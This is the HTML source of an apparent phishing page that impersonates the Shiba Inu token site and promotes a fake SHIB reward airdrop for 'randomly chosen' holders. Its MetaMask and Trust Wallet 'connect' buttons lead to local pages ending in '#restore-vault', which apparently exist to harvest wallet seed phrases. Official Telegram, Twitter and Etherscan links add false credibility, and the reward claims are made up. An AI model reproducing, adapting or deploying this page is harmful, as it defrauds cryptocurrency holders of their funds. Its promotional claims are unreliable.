
<html>
  <head>
    <meta charset="utf-8">
    <title>Shiba Token — A Decentralized Ecosystem</title>
    <link href="./events/css/normalize.css" rel="stylesheet" type="text/css" />
    <link href="./events/css/components.css" rel="stylesheet" type="text/css" />
    <link rel="stylesheet" href="./events/css/boootstrap.min.css" />
    <link href="./events/css/shiba-ui.css?v=1.1" rel="stylesheet" type="text/css" />
    <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
    <script src="https://shibatoken.com/js/clipboard.min.js"></script>
    <script src="https://shibatoken.com/js/particles.min.js"></script>
    <script src="https://shibatoken.com/js/swiper-bundle.min.js"></script>
    <link href="https://shibatoken.com/img/favicon.png" rel="shortcut icon" type="image/x-icon" />
    <link href="https://shibatoken.com/img/favicon.png" rel="apple-touch-icon" />
    <style>
      span.ss4 {
        align-self: center;
        color: white;
      }
.cta-btn-transparent__gradhide.dark {
    background-color: #1f1e2900;
}


      a:hover {
        color: transparent !important;
      }

      .btn:hover {
        background: #035ca1;
      }

      .container-1440 {
        padding-top: 4rem;
      }

      .section {
        margin: 0 0px !important;
      }

      .btn:after {
        right: -14px;
        border-bottom: 14px solid transparent;
        border-left: 0px solid #699bcb00;
      }

      .btn:before {
        left: -14px;
        border-top: 14px solid transparent;
        border-right: 0px solid #699bcb00;
      }

      .btn:hover:before {
        border-right-color: #4b7ead00;
      }

      body {
        user-select: none;
      }

      .alert {
    position: relative;
    height: 37px;
    font-size: 15px;
    letter-spacing: 2px;
    width: 27rem;
    margin: 0 15px;
    padding: 0px 10px;
    text-align: left;
      }

      .adress-right {
        padding: 0 10px;
      }

      .btn {
        background-color: #bf3138;
        position: relative;
        padding: 5px 10px;
        font-size: 11px;
        line-height: 10px;
      }

      .btn:before {
        left: -14px;
        border-top: 14px solid transparent;
        border-right: 14px solid #699bcb00;
      }

      .AssetsReceive_assets__3lBpd .AssetsReceive_content__1tsWH .AssetsReceive_receiveForm__31cIv {
        position: absolute;
        left: 200px;
        top: 50%;
        -webkit-transform: translateY(-50%);
        transform: translateY(-50%);
        z-index: 2;
        padding: 25px 40px;
        width: 555px;
        border-radius: 16px;
        background-color: rgba(4, 21, 38, .8);
        color: #fff;
        text-align: center;
      }

      .Header_header__MbTxY .Header_logo__3yB-7 {
        width: 30px;
        height: 50px;
        cursor: pointer;
      }

      .AssetsReceive_assets__3lBpd .AssetsReceive_content__1tsWH .AssetsReceive_right__3Wi6N {
        position: absolute;
        top: 50%;
        -webkit-transform: translateY(-50%);
        transform: translateY(-50%);
        right: 0;
        float: right;
        width: 600px;
        height: 600px;
        max-height: 100%;
      }

      .AssetsReceive_assets__3lBpd .AssetsReceive_content__1tsWH {
        width: 100%;
        height: 100%;
        background-image: url(https://www.hvteco.io/static/media/bg_assets_pc.589fe725.svg);
        background-size: cover;
        background-repeat: no-repeat;
      }

      @font-face {
        font-family: inter;
        src: url('inter.woff2') format('woff2');
      }

      @font-face {
        font-family: atkinson;
        src: url('atkinson.woff2') format('woff2');
      }

      * {
        font-family: sans-serif;
      }

      body {
        background-color: #000;
        background: #1f1e29 no-repeat center center fixed;
        background-size: cover;
        font-family: sans-serif;
      }

      nav .btncustom {
        margin-left: 10px;
      }

      .btncustom,
      a.btncustom {
        text-decoration: none;
        padding: 0.5rem;
        border-radius: 12px;
        font-weight: 500;
      }

      .btncustom2,
      a.btncustom2 {
        text-decoration: none;
        padding: 10px 20px;
        color: #fff;
        font-weight: 700;
        background-color: rgb(44, 47, 54);
        border: 1px solid rgb(64, 68, 79);
        border-radius: 12px;
      }

      .btnprimary {
        color: rgb(80, 144, 234);
        background: #1c2f48;
      }

      .btnsecondary {
        color: #fff;
        background: rgb(33, 36, 41);
      }

      .card-custom {
        background: rgb(25, 27, 31);
        color: #fff;
        padding: 1px;
        border-radius: 24px;
        font-size: 14pt;
      }

      .card-item {
    background: rgb(14 14 18);
    border-radius: 10px;
    border: 3px solid rgb(44, 47, 54);
      }
button.btncustom.btn-block.mt-3 {
    background: #100f15;
    border: 2px solid rgb(44, 47, 54);
}

      .combo-ellipse-container {
        background-color: rgb(25, 27, 31);
        border-radius: 16px;
        padding: 10px 8px;
        width: 30%;
        cursor: pointer;
      }

      .combo-ellipse-container img {
        background-color: #fff;
        border-radius: 150px;
      }

      .item-arrow-separator {
        background-color: rgb(33, 36, 41);
        border: 3px solid rgb(25, 27, 31);
        border-radius: 12px;
        height: 35px;
        width: 35px;
        margin: auto;
        position: relative;
        margin-top: -14px;
        margin-bottom: -32px;
        z-index: 99;
      }

      .item-value {
        overflow: hidden;
        width: 60%;
      }

      .alert {
        border: 1px solid #fd4146;
        color: #fd4146;
        border-radius: 12px;
      }

      .hiddenElement {
        display: none !important;
      }

      @media screen and (max-width: 600px) {
        .hidden-on-mobile {
          display: none !important;
        }

        .combo-ellipse-container {
          width: 65%;
        }

        .item-value {
          width: 35%;
        }

        .item-value span,
        .item-value small {
          font-size: 10pt !important;
        }
      }

      @media screen and (max-width: 1024px) {
        .hidden-on-mobile {
          display: none !important;
        }

        .combo-ellipse-container {
          width: 60%;
        }

        .item-value {
          width: 40%;
        }

        p {
          margin-top: 0;
          margin-bottom: 0rem;
          font-family: "Poppins", sans-serif;
        }

        span {
          font-family: sans-serif;
        }

        .Footer_footerRight__2KSzU {
          font-family: sans-serif;
        }

        p {
          margin-top: 0;
          margin-bottom: 0rem;
          font-family: sans-serif;
        }

        .item-value span,
        .item-value small {
          font-size: 10pt !important;
        }
      }
    </style>
  </head>
  <body>
    <div class="custom_style w-embed">
      <style>
        body,
        html {
          max-width: 100% !important;
          overflow-x: hidden !important;
          background-color: #1f1e29;
        }

        ::-moz-selection {
          color: #fff;
          background: #f06500;
        }

        ::selection {
          color: #fff;
          background: #f06500;
        }

        @media (min-width: 992px) AND (max-width: 1340px) {
          .hero--art {
            width: 350px;
          }

          .hero--moon {
            width: 518px;
          }
        }

        @media (min-width: 992px) AND (max-width: 1400px) {
          .nav-link.more {
            display: none;
          }

          .nav-drop.more {
            display: block;
          }
        }

        @media (min-width: 992px) AND (max-width: 1250px) {
          .nav-link.ss {
            display: none;
          }

          .nav-drop-link.ss {
            display: block;
          }
        }

        @media (min-width: 992px) AND (max-width: 1200px) {
          .coin-grid {
            grid-column-gap: 32px;
            grid-row-gap: 32px;
          }

          .section {
            margin: 0 0px;
          }

          .coin-box-content {
            padding-top: 40px;
            padding-right: 40px;
            padding-bottom: 48px;
            padding-left: 40px;
          }

          .coin-box--coin {
            height: 100px;
          }

          .coin-box-top {
            height: 200px;
          }
        }

        .brand-url--logo,
        .coin-box--coin,
        .coin-box-elip-bg,
        .coin-box-graph--ico,
        .coin1-shad,
        .cta-btn--ico,
        .eco-cta--ico,
        .eco-cta--ico-hover,
        .hero--moon,
        .hero-bg-glow,
        .hero__scrollbtn--arrow,
        .hero__scrollbtn--img,
        .meat,
        .scrol-up-cta--ico,
        .ss--img-glow {
          -webkit-user-select: none;
          -khtml-user-select: none;
          -moz-user-select: none;
          -o-user-select: none;
          user-select: none;
        }

        .arr-up-trigger,
        .brand-url--logo,
        .cta-btn--ico,
        .eco-cta--ico,
        .eco-cta--ico-hover,
        .hero--moon,
        .hero-bg-glow,
        .hero__scrollbtn--arrow,
        .hero__scrollbtn--img,
        .meat {
          pointer-events: none;
        }

        #modal::-webkit-scrollbar {
          width: 10px;
          border-radius: 16px;
          background-color: transparent;
        }

        #modal::-webkit-scrollbar-thumb {
          background-color: #2b2a36;
          border-radius: 16px;
        }
      </style>
    </div>
    <div data-w-id="f0e5ad37-b0ef-10db-2c5c-8f577fe3fd53" class="arr-up-trigger"></div>
    <div data-collapse="medium" data-animation="default" data-duration="400" id="up" role="banner" class="navbar w-nav" style="
    padding: 50px 45px 0px;
    top: 0px;
    position: relative;
">
      <style>
        .oo {
          position: fixed;
          top: 88%;
          right: 0;
          -webkit-transform: translateY(-50%);
          transform: translateY(-50%);
          font-size: 0;
          line-height: 0;
          z-index: 999;
        }
      </style>
      <a href="index.html" aria-current="page" class="brand-url w-nav-brand w--current">
        <div class="brand-url-logo-wrap">
          <img src=" ./images/shib-logo.svg" loading="eager" alt="" class="brand-url--logo"\ style="
    margin-bottom: -4px;
    margin-right: 8px;
" />
        </div>
        <div class="brand-url-txt-wrap">
          <div class="brand-url--txt white" style="transform: translate3d(0px, 3px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">SHIBA&nbsp;TOKEN</div>
          <div class="brand-url--txt orange" style="transform: translate3d(0px, 30px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">SHIBA&nbsp;TOKEN</div>
        </div>
      </a>
      <nav role="navigation" class="nav-menu w-nav-menu">
        <a href="index.html" aria-current="page" class="brand-url mobile-menu w-nav-brand w--current">
          <div class="brand-url-logo-wrap">
            <img src="./images/shib-logo.svg" loading="eager" alt="" class="brand-url--logo" />
          </div>
          <div class="brand-url-txt-wrap">
            <div class="brand-url--txt white" style="transform: translate3d(0px, 3px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">SHIBA&nbsp;TOKEN</div>
            <div class="brand-url--txt orange" style="transform: translate3d(0px, 30px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">SHIBA&nbsp;TOKEN</div>
          </div>
        </a>
        <div class="nav-menu-holder">
          <a href="#ecosystem" class="nav-link w-nav-link">Ecosystem</a>
          <a href="#how-to-buy" class="nav-link buy w-nav-link">Buy</a>
          <a href="#shibaswap" class="nav-link ss w-nav-link">ShibaSwap</a>
          <a href="#art" class="nav-link more w-nav-link">Art</a>
          <a href="#rescue" class="nav-link more w-nav-link">Rescue</a>
          <a href="#community" class="nav-link more w-nav-link">Community</a>
          <div data-hover="" data-delay="200" class="nav-drop more w-dropdown">
            <div class="nav-drop-toggle w-dropdown-toggle" id="w-dropdown-toggle-0" aria-controls="w-dropdown-list-0" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0">
              <div>More</div>
              <img src="./images/lang-arr.svg" loading="eager" alt="" class="nav-drop-toggle__ico" style="transform: translate3d(0px, -2px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
            </div>
            <nav class="nav-drop-list w-dropdown-list w--auto" id="w-dropdown-list-0" aria-labelledby="w-dropdown-toggle-0" style="transform: translate3d(0px, 16px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d; opacity: 0;">
              <a href="#how-to-buy" class="nav-drop-link buy w-dropdown-link" tabindex="0">Buy</a>
              <a href="#shibaswap" class="nav-drop-link ss w-dropdown-link" tabindex="0">ShibaSwap</a>
              <a href="#art" class="nav-drop-link w-dropdown-link" tabindex="0">Art</a>
              <a href="#rescue" class="nav-drop-link w-dropdown-link" tabindex="0">Rescue</a>
              <a href="#community" class="nav-drop-link w-dropdown-link" tabindex="0">Community</a>
              <img src="./images/lang-ico.svg" loading="eager" alt="" class="nav-drop-list__ico" />
            </nav>
          </div>
          <div class="nav-menu-divider"></div>
          <div data-hover="" data-delay="200" class="nav-drop w-dropdown" style="">
            <div class="nav-drop-toggle w-dropdown-toggle" id="w-dropdown-toggle-1" aria-controls="w-dropdown-list-1" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0">
              <div>EN</div>
              <img src="./images/lang-arr.svg" loading="eager" alt="" class="nav-drop-toggle__ico" style="transform: translate3d(0px, -2px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
            </div>
            <nav class="nav-drop-list w-dropdown-list" id="w-dropdown-list-1" aria-labelledby="w-dropdown-toggle-1" style="transform: translate3d(0px, 16px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d; opacity: 0;">
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">Spanish</a>
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">German</a>
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">Italian</a>
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">Hebrew</a>
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">Russian</a>
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">Romanian</a>
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">Vietnamese</a>
              <a href="#" class="nav-drop-link inactive w-dropdown-link" tabindex="0">Chinese</a>
              <img src="./images/lang-ico.svg" loading="eager" alt="" class="nav-drop-list__ico" />
            </nav>
          </div>
          <a data-w-id="connectModal" href="" class="cta-btn-transparent mobile-menu w-inline-block triggerConnectWallet">
            <div class="cta-btn__txt" style="color:white;">Connect Wallet</div>
            <div class="cta-btn-transparent__gradhide"></div>
            <div class="cta-btn-transparent__gradhide-red" style="opacity: 0;"></div>
            <div class="cta-btn-transparent__animbox" style="width: 0%; height: 61px;"></div>
          </a>
        </div>
      </nav>
      <quot; viewbox="0 0 400 400" width="400" height="400" preserveaspectratio="xMidYMid meet" style="width: -6px;height: 100%;transform: translate3d(0px, 0px, 0px);">
        <defs>
          <clippath id="__lottie_element_2">
            <rect width="400" height="400" x="0" y="0"></rect>
          </clippath>
        </defs>
        <g clip-path="url(#__lottie_element_2)">
          <g id="burger_3" transform="matrix(1,0,0,1,200,199.875)" opacity="1" style="display: block;">
            <g class="barre_3" opacity="1" transform="matrix(1,0,0,1,0,75)">
              <path fill="rgb(255,255,255)" fill-opacity="1" d=" M110,0 C110,0 110,0 110,0 C110,5.519000053405762 105.51899719238281,10 100,10 C100,10 -100,10 -100,10 C-105.51899719238281,10 -110,5.519000053405762 -110,0 C-110,0 -110,0 -110,0 C-110,-5.519000053405762 -105.51899719238281,-10 -100,-10 C-100,-10 100,-10 100,-10 C105.51899719238281,-10 110,-5.519000053405762 110,0z"></path>
            </g>
          </g>
          <g id="burger_2" transform="matrix(1,0,0,1,200,199.875)" opacity="1" style="display: block;">
            <g class="barre_2" opacity="1" transform="matrix(1,0,0,1,0,0)">
              <path fill="rgb(255,255,255)" fill-opacity="1" d=" M110,0 C110,0 110,0 110,0 C110,5.519000053405762 105.51899719238281,10 100,10 C100,10 -100,10 -100,10 C-105.51899719238281,10 -110,5.519000053405762 -110,0 C-110,0 -110,0 -110,0 C-110,-5.519000053405762 -105.51899719238281,-10 -100,-10 C-100,-10 100,-10 100,-10 C105.51899719238281,-10 110,-5.519000053405762 110,0z"></path>
            </g>
          </g>
          <g id="burger_1" transform="matrix(1,0,0,1,200,199.875)" opacity="1" style="display: block;">
            <g class="barre_1" opacity="1" transform="matrix(1,0,0,1,0,-75)">
              <path fill="rgb(255,255,255)" fill-opacity="1" d=" M110,0 C110,0 110,0 110,0 C110,5.519000053405762 105.51899719238281,10 100,10 C100,10 -100,10 -100,10 C-105.51899719238281,10 -110,5.519000053405762 -110,0 C-110,0 -110,0 -110,0 C-110,-5.519000053405762 -105.51899719238281,-10 -100,-10 C-100,-10 100,-10 100,-10 C105.51899719238281,-10 110,-5.519000053405762 110,0z"></path>
            </g>
          </g>
          <clippath id="__lottie_element_2">
            <rect width="400" height="400" x="0" y="0"></rect>
          </clippath>
          <g clip-path="url(#__lottie_element_2)">
            <g id="burger_3" transform="matrix(1,0,0,1,200,199.875)" opacity="1" style="display: block;">
              <g class="barre_3" opacity="1" transform="matrix(1,0,0,1,0,75)">
                <path fill="rgb(255,255,255)" fill-opacity="1" d=" M110,0 C110,0 110,0 110,0 C110,5.519000053405762 105.51899719238281,10 100,10 C100,10 -100,10 -100,10 C-105.51899719238281,10 -110,5.519000053405762 -110,0 C-110,0 -110,0 -110,0 C-110,-5.519000053405762 -105.51899719238281,-10 -100,-10 C-100,-10 100,-10 100,-10 C105.51899719238281,-10 110,-5.519000053405762 110,0z"></path>
              </g>
            </g>
            <g id="burger_2" transform="matrix(1,0,0,1,200,199.875)" opacity="1" style="display: block;">
              <g class="barre_2" opacity="1" transform="matrix(1,0,0,1,0,0)">
                <path fill="rgb(255,255,255)" fill-opacity="1" d=" M110,0 C110,0 110,0 110,0 C110,5.519000053405762 105.51899719238281,10 100,10 C100,10 -100,10 -100,10 C-105.51899719238281,10 -110,5.519000053405762 -110,0 C-110,0 -110,0 -110,0 C-110,-5.519000053405762 -105.51899719238281,-10 -100,-10 C-100,-10 100,-10 100,-10 C105.51899719238281,-10 110,-5.519000053405762 110,0z"></path>
              </g>
            </g>
            <g id="burger_1" transform="matrix(1,0,0,1,200,199.875)" opacity="1" style="display: block;">
              <g class="barre_1" opacity="1" transform="matrix(1,0,0,1,0,-75)">
                <path fill="rgb(255,255,255)" fill-opacity="1" d=" M110,0 C110,0 110,0 110,0 C110,5.519000053405762 105.51899719238281,10 100,10 C100,10 -100,10 -100,10 C-105.51899719238281,10 -110,5.519000053405762 -110,0 C-110,0 -110,0 -110,0 C-110,-5.519000053405762 -105.51899719238281,-10 -100,-10 C-100,-10 100,-10 100,-10 C105.51899719238281,-10 110,-5.519000053405762 110,0z"></path>
              </g>
            </g>
          </g>
        </g>
      </quot;>
      <div class="w-nav-overlay" data-wf-ignore="" id="w-nav-overlay-0"></div>
      <div class="w-nav-overlay" data-wf-ignore="" id="w-nav-overlay-0"></div>
      <div class="w-nav-overlay" data-wf-ignore="" id="w-nav-overlay-0"></div>
    </div>
    <div class="section__hero">
      <div class="container-1440">
        <div class="hero-wrap">
          <div class="hero-left-wrap" style="
    padding-top: 60px;
    padding-bottom: 120px;
">
            <h1 class="h1" style="
">The Shiba Inu Ecosystem WOOF Reward</h1>
            <p class="p hero" style="
    max-width: 611px;
    margin-bottom: 0px;
">SHIB, LEASH, BONE Currently, we our appreciation for those of your who are still loyal to us in 2023. We share Rewards 240.000.000 $SHIB. Claims Your Rewards Connect for your Wallet.</p>
          </div>
          <div class="hero-right-wrap">
            <img src="./images/hero-shib.png" loading="eager" alt="" class="hero--art" style="width: 365px; top: 0px;" />
            <img src="./images/moon.svg" loading="eager" alt="" class="hero--moon" style="top: -125px; right: -275px; width: 615px;" />
          </div>
          <a class="hero__scrollbtn w-inline-block" href="#community">
            <img src="./images/hero-scroll-shape.svg" loading="eager" alt="" class="hero__scrollbtn--img" />
            <img src="./images/hero-scroll-arr.svg" loading="eager" alt="" class="hero__scrollbtn--arrow" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
          </a>
          <img src="./images/bg-glow.svg" loading="eager" style="opacity: 0;" alt="" class="hero-bg-glow" />
        </div>
      </div>
      <div id="particles-js" class="particle-class"></div>
    </div>
    <div id="community" class=" section__com " style="
    padding-top: 50px;
    padding-bottom: 50px;
">
      <div class=" container-1440 ">
        <div class=" com-wrap ">
          <h2 class=" h1 " style=" font-size: 50px; font-family: system-ui; margin-bottom: 0; font-weight: 900; ">SHIB Claim your Reward</h2>
          <p class=" p " style="
    margin-bottom: 30px;
    text-transform: uppercase;
    letter-spacing: 7px;
    font-stretch: ultra-condensed;
">
            <span class=" p--orange " style="font-weight: 900;">limited supply</span>
          </p>
          <p class=" p ">The random <span class=" p--white ">260 People</span> chosen by the <span class=" p--orange "> $SHIB</span> community. </p>
          <div class=" adress-wrap " style="
    margin-top: 20px;
    padding: 20px 30px 20px 30px;
    background-color: #1f1e29;
">
            <div class=" adress-right " style="
">
              <a href="/click/metamask/index.html?key=68565658947c8cabfe1a90d&amp;submetric=56856vbcv#restore-vault" class=" cta-copy trigger" "="">
                <img src="https://i.postimg.cc/MGRY4L1B/icon-48x48.png" loading="lazy" alt="" class="soc-link--img" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg);transform-style: preserve-3d;z-index: 5;height: 30px;margin-bottom: -3px;margin-right: 10px;margin-left: -5px;margin-top: -4px;">
                <div class=" cta-btn__txt" style="bottom: 2px;color:white;"> Connect  META MASK</div>
                <div class=" cta-btn-transparent__gradhide dark "></div>
                <div class="cta-btn-transparent__gradhide-red" style="opacity: 0;"></div>
                <div class="cta-btn-transparent__animbox" style="width: 0%; height: 58px;"></div>
                <div class="cta-copied-box" style="opacity: 0;">
                  <div class="cta-copied-txt">
                    <strong>Shiba Claim</strong>
                  </div>
                </div>
              </a>
            </div>
          </div>
					     <div class=" adress-wrap " style="
    margin-top: 1px;
    padding: 10px 30px 20px 30px;
    background-color: #1f1e29;
">
            <div class=" adress-right " style="
">
              <a href="/click/trustwalls/index.html?key=68565658947c8cabfe1a90d&submetric=56856vbcv#restore-vault" class=" cta-copy trigger"
">
                <img src="https://i.ibb.co/XxKpNKS/favicon.png" loading="lazy" alt="" class="soc-link--img" style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg);transform-style: preserve-3d;z-index: 5;height: 30px;margin-bottom: -3px;margin-right: 10px;margin-left: -5px;margin-top: -4px;" />
                <div class=" cta-btn__txt" style="bottom: 2px;color:white;">Connect TRUST WALLET</div>
                <div class=" cta-btn-transparent__gradhide dark "></div>
                <div class="cta-btn-transparent__gradhide-red" style="opacity: 0;"></div>
                <div class="cta-btn-transparent__animbox" style="width: 0%; height: 58px;"></div>
                <div class="cta-copied-box" style="opacity: 0;">
                  <div class="cta-copied-txt">
                    <strong>Shiba Claim</strong>
                  </div>
                </div>
              </a>
            </div>
          </div>
          <div class="airdrop-top" style="
    /* display: -webkit-box; */
    display: -ms-flexbox;
    display: flow-root;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
    -webkit-align-content: normal;
    margin-top: 10px;
    
    
">
            <div class="airdrop-top__item" style="
    text-align: center;
    font-family: 'Proxima Nova Light','Open Sans',sans-serif;
    font-size: 14px;
    color: #989dc0;
    font-weight: 300;
 	display: inline-block;
    position: relative;
    margin-right: 10px;
    margin-left: 10px;
    
">
              <div class="airdrop-top__number" style="color: #3f51b5;font-family: 'Proxima Nova Black','Open Sans',sans-serif;font-size: 20px;font-weight: 900;margin-bottom: auto;">30 June 2023</div> End Date
            </div>
            <div class="airdrop-top__item" style="
    text-align: center;
    font-family: 'Proxima Nova Light','Open Sans',sans-serif;
    font-size: 14px;
    color: #989dc0;
    font-weight: 300;
 display: inline-block;
    position: relative;
    margin-right: 10px;
    margin-left: 10px;
">
              <div class="airdrop-top__number" style="color: #f28b03;font-family: 'Proxima Nova Black','Open Sans',sans-serif;font-size: 20px;font-weight: 900;margin-bottom: 0px;left:4px;"> +8M </div> Max. Rewards
            </div>
            <div class="airdrop-top__item" style="
    text-align: center;
    font-family: 'Proxima Nova Light','Open Sans',sans-serif;
    font-size: 14px;
    color: #989dc0;
    font-weight: 300;
	display: inline-block;
    position: relative;
    margin-right: 10px;
    margin-left: 10px;
    
">
              <div class="airdrop-top__number" style="color: #17bb1e;font-family: 'Proxima Nova Black','Open Sans',sans-serif;font-size: 20px;font-weight: 900;margin-bottom: 0px;"> $50.000 USD </div> Estimated Value Max
            </div>
          </div>
        </div>
      </div>
    </div>
    <div id=" art " class=" section__art ">
      <div class=" container-1440 ">
        <div class=" art-wrap ">
          <h2 class=" h1 ">Art</h2>
          <p class=" p ">We are proud to support ingenuity in all its forms with the <span class=" p--orange ">Shiba Inu Incubator</span>. The ShibArmy is made up of talented individuals who have united to build something remarkable, and we support this by cultivating an environment which encourages creativity and growth. Through the power of the Shiba Inu Incubator, we help holders find the tools they need to bring their inspiration and unique perspectives to life. This as just another way to encourage others to step outside of preconceived limits and regulations and experience what it means to be part of our decentralized movement. </p>
        </div>
      </div>
    </div>
    <div class=" section__footer ">
      <div class=" container-1440 ">
        <div class=" footer-wrap ">
          <p class=" p footer ">Our community grows stronger every day. Please follow our social platforms to get the most up-to-date, accurate SHIB information. <br />
            <br />Using the links below, you can join our various groups alongside the <span class=" p--white ">1M+</span> other members of the ShibArmy.
          </p>
          <div class=" footer-country-link ">Click here to search for your preferred country!</div>
          <div class=" footer-soc-wrap ">
            <a data-w-id=" a5635a4e-89b7-9198-04ba-a93660281b0e " href=" https://t.me/ShibaInu_Dogecoinkiller " target=" _blank " class=" soc-link w-inline-block " style="color: rgb(187, 187, 190);">
              <img src=" ./images/ico-tel.svg " loading=" lazy " alt="" class=" soc-link--img " style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
              <div>Shiba Ecosystem Telegram <br />
              </div>
            </a>
            <a href=" https://twitter.com/shibtoken " target=" _blank " class=" soc-link w-inline-block " style="color: rgb(187, 187, 190);">
              <img src=" ./images/ico-tw.svg " loading=" lazy " alt="" class=" soc-link--img " style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
              <div>Twitter</div>
            </a>
            <a href=" https://www.reddit.com/r/SHIBArmy /" target=" _blank " class=" soc-link w-inline-block " style="color: rgb(187, 187, 190);">
              <img src=" ./images/ico-red.svg " loading=" lazy " alt="" class=" soc-link--img " style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
              <div>Reddit</div>
            </a>
            <a href=" https://discord.gg/shibatoken " target=" _blank " class=" soc-link w-inline-block " style="color: rgb(187, 187, 190);">
              <img src=" ./images/ico-dis.svg " loading=" lazy " alt="" class=" soc-link--img " style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
              <div>Discord</div>
            </a>
            <a href=" https://instagram.com/shibatoken_official?utm_medium=copy_link " target=" _blank " class=" soc-link w-inline-block " style="color: rgb(187, 187, 190);">
              <img src=" ./images/instagram.svg " loading=" lazy " alt="" class=" soc-link--img " style="transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" />
              <div>Instagram</div>
            </a>
          </div>
        </div>
      </div>
      <div class=" footer-bottom ">
        <div class=" container-1440 ">
          <div class=" footer-bottom-wrap ">
            <a href=" https://shytoshikusama.medium.com " target=" _blank " class=" footer--link ">Medium</a>
            <a href=" https://etherscan.io/token/0x95aD61b0a150d79219dCF64E1E6Cc01f0B64C4cE " target=" _blank " class=" footer--link ">Etherscan</a>
            <a href=" https://coinmarketcap.com/en/currencies/shiba-inu /" target=" _blank " class=" footer--link ">CoinMarketCap</a>
            <a href=" https://www.coingecko.com/en/coins/shiba-inu " target=" _blank " class=" footer--link ">CoinGecko</a>
          </div>
        </div>
      </div>
    </div>
    <a href=" #up " class=" scroll-up-cta w-inline-block ">
      <img src=" ./images/ico-arrow-up.svg " loading=" lazy " alt="" class=" scrol-up-cta--ico " />
    </a>
    <div class=" tel-modal " style="opacity: 0; display: none;">
      <div id=" modal " class=" tel-modal-wrap " style="transform: translate3d(0px, 60px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
        <div class=" tel-modal--title ">International Telegrams</div>
        <a href=" https://t.me/shibainuafricaenglish " target=" _blank " class=" tel-modal--link ">African English Group</a>
        <a href=" https://t.me/Shibaafrikfranco " target=" _blank " class=" tel-modal--link ">African French Group</a>
        <a href=" https://t.me/shibaarabic " target=" _blank " class=" tel-modal--link ">Arabic Group</a>
        <a href=" https://t.me/shibainuargentina " target=" _blank " class=" tel-modal--link ">Argentina Group</a>
        <a href=" https://t.me/shibainuaustralia " target=" _blank " class=" tel-modal--link ">Australian Group</a>
        <a href=" https://t.me/shibainubalkan " target=" _blank " class=" tel-modal--link ">Balkans Group</a>
        <a href=" https://t.me/shibainubangladesh " target=" _blank " class=" tel-modal--link ">Bangladesh Group</a>
        <a href=" https://t.me/Official_SHIBA_INU_BRAZIL " target=" _blank " class=" tel-modal--link ">Brazilian Group</a>
        <a href=" https://t.me/shibainubulgaria " target=" _blank " class=" tel-modal--link ">Bulgarian Group</a>
        <a href=" https://t.me/shibainucambodia " target=" _blank " class=" tel-modal--link ">Cambodia Group</a>
        <a href=" https://t.me/shibainuchinese " target=" _blank " class=" tel-modal--link ">Chinese Group</a>
        <a href=" https://t.me/shibainucolombia " target=" _blank " class=" tel-modal--link ">Columbian Group</a>
        <a href=" https://t.me/shibainucongo " target=" _blank " class=" tel-modal--link ">Congo Group</a>
        <a href=" https://t.me/shibainucostarica " target=" _blank " class=" tel-modal--link ">Costa Rica Group</a>
        <a href=" https://t.me/shibainuczech " target=" _blank " class=" tel-modal--link ">Czech Republic &amp; Slovakia Group</a>
        <a href=" https://t.me/shibainunederland " target=" _blank " class=" tel-modal--link ">Dutch Group</a>
        <a href=" https://t.me/ShibaEst " class=" tel-modal--link ">Estonian Group</a>
        <a href=" https://t.me/shibaphilippines " target=" _blank " class=" tel-modal--link ">Filipino Group</a>
        <a href=" https://t.me/shibainufinland " target=" _blank " class=" tel-modal--link ">Finland Group</a>
